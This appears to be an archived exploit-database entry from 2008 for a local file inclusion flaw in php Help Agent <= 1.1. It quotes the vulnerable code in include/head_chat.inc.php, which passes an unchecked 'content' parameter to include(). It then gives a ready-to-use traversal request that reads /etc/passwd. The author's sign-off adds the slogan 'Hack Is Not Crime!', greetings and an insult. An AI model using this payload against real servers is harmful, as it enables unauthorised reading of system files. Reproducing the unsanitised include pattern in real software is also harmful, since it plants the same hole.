[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : php Help Agent <= 1.1 (content) Local File Inclusion Vulnerability
# Published : 2008-07-15
# Author : BeyazKurt
# Previous Title : Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability
# Next Title : Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability


#####################################################
# Author : BeyazKurt
# Contact : Djm-sut@Hotmail.Com
#
# Script : php Help Agent (v1.1 Full & 1.0)
# Risk : Local File Include
# Download : http://sourceforge.net/projects/phphelpagent/
#
# File : include/head_chat.inc.php
#
# Code :
# <?php
#     if(file_exists($content)) {
#   include($content);
#     }
# ?>
#
# Exploit :
#
#  Vuln.Com/include/head_chat.inc.php?content=../../../../etc/passwd
#
# /* Hack Is Not Crime! */
# -------------------------------
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#                      Proud 2 Be ALBANIAN
#                      4Ever FENERBAH??E (H)
#
# Z0ne-H gicik v1 is public :D (Download NetkabuS.CoM)
# Not : Fuck off pala! aq lameri.
#
# Thnx : All Muslims Albanian & Turkish Coder..
# Thnx : dArkSAnqelSu | anladin sen onu anladin... :)
#
#######################################################

# www.Syue.com [2008-07-15]